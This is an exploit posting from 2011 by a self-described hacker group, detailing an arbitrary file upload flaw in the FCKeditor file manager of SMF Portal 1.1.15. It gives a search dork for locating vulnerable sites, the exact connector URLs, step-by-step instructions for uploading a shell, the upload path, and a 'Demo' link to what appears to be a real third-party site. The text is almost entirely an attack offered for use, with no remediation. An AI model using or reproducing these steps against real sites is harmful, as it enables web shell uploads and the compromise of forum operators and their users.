In The Name Of GOD ============================================================================== SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ============================================================================== [»] Title : [ SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ] [»] TestedON: [ LINUX ] [»] Download: [ http://www.simplemachines.org/ ] [»] Author : [ HELLBOY } [»] Email : [ A68_HELLBOY@YAHOO.COM ] [»] Date : [ 2011-12-2 ] [»] Version : [ 1.1.15 ] [»] Dork : [ "Powered by SMF 1.1.15" ] ########################################################################### InformatioN : 1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php 2. SELECT You'r Shell and Click OK. 3. Formats can be uploaded (Php6,Jpg,gif,Xml,...) 4. Uploaded File Location : Target.com/tp-images/File/File Name ########################################################################### ===[ Exploit ]=== [»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php [»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php ===[ Demo ]=== [»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php ===[ We Are : ./Iranian HackerZ ]=== Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE ###########################################################################